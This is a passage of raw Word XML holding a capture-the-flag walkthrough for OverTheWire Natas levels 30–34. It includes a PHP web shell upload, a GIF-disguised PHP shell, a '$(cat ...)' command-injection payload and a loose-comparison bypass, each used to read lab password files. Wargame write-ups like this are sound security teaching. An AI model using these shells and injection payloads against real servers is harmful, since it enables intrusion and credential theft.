          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>natas31</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>&amp;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> enter  </w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> : []</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">=x </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E33D26F" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00BF7EEB" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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This tricks PHP into bypassing the check.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="151CCA70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 xml:space="preserve">Tools Used: Browser </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C8EE390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Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60BCB99E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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PHP loosely compares (== instead of ===).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4329C5FA" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="349CF105" w14:textId="147F6C6C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 xml:space="preserve">Level 31 </w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 32 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D7278F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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70154B26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Create shell.php:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF0E577" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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&lt;?php system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639FFF63" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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Upload it </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>in</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> the form.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C156E3B" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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 xml:space="preserve">Access </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial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 xml:space="preserve"> by the:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D328B2D" w14:textId="7D799598" w:rsidR="0024263C" w:rsidRPr="00AC7BC5" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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http://natas31.natas.labs.overthewire.org/uploads/shell.php?cmd=cat+/etc/natas_webpass/natas3</w:t>
      </w:r>
      <w:r w:rsidR="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07120A9A" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00E521D8" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:p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Output shows password</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC7BC5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2D73D6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Tools Used: php script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC1B3EF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lastRenderedPageBreak/>
        <w:t xml:space="preserve"> Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E208D79" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00880EFE" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:ind w:left="720"/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Upload a PHP shell to execute commands.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E036E5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</w:p>
    <w:p w14:paraId="21A6C42A" w14:textId="7E0DF15F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 xml:space="preserve">Level 32 </w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Level 33 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C031FD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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094A6944" w14:textId="2C8E0E7F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Submit  '$(cat /etc/natas_webpass/natas3</w:t>
      </w:r>
      <w:r w:rsidR="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>)'.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B50B95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The command executes, leaking the password.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A89F73E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Tools Used: Burp Suite </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DEF47E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Logic:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09565FFE" w14:textId="32282215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Inject '$(cat /etc/natas_webpass/natas3</w:t>
      </w:r>
      <w:r w:rsidR="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>)' to bypass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB80CAF" w14:textId="77777777" w:rsidR="00880EFE" w:rsidRDefault="00880EFE" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51AD3B0F" w14:textId="7208126E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 xml:space="preserve">Level 33 </w:t>
      </w:r>
      <w:r w:rsidR="00880EFE" w:rsidRPr="0024263C">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">--&gt; </w:t>
      </w:r>
      <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Level 34 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBF9998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Steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A7452AE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Upload shell.jpg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B94BDCC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GIF89a; &lt;?php system($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3441F3C2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Rename to shell.php.jpg.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6131193D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Access it and run: ?cmd=cat+/etc/natas_webpass/natas34</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A2291B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Password appears.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0FB285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Tools Used:Burp Suite </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48407D9F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  <w:r w:rsidRPr="00880EFE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Logic:Upload a fake .jpg with PHP code inside.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D20066A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</w:p>
    <w:p w14:paraId="00A2FF8E" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00880EFE" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0832A58F" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="00D02C35" w:rsidRDefault="0024263C" w:rsidP="0024263C">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39502B5A" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22694BF6" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D5A25FD" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25EA265C" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62DC4008" w14:textId="77777777" w:rsidR="0024263C" w:rsidRDefault="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FDB05D0" w14:textId="77777777" w:rsidR="0024263C" w:rsidRPr="0024263C" w:rsidRDefault="0024263C">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0024263C" w:rsidRPr="00242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166BF"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="E80E1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906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3C"/>
    <w:rsid w:val="000B14EE"/>
    <w:rsid w:val="001539C1"/>
    <w:rsid w:val="00165ED6"/>
    <w:rsid w:val="0024263C"/>
    <w:rsid w:val="003B6D8C"/>
    <w:rsid w:val="0057696B"/>
    <w:rsid w:val="005B3ACA"/>
    <w:rsid w:val="007D00C2"/>
    <w:rsid w:val="007E62F1"/>
    <w:rsid w:val="00856A66"/>
    <w:rsid w:val="00880EFE"/>
    <w:rsid w:val="00946301"/>
    <w:rsid w:val="0098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FF14"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{CF7E82D4-94BC-4884-805A-9A200731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6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6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6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6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6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6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6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6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6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6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22</Pages>
  <Words>1827</Words>
  <Characters>10420</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>86</Lines>
  <Paragraphs>24</Paragraphs>
  <ScaleCrop>false</ScaleCrop>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>12223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Jagtap</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Kajal Jagtap</cp:lastModifiedBy>
  <cp:revision>8</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-04-28T15:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-04-28T16:06:00Z</dcterms:modified>
</cp:coreProperties>
</file>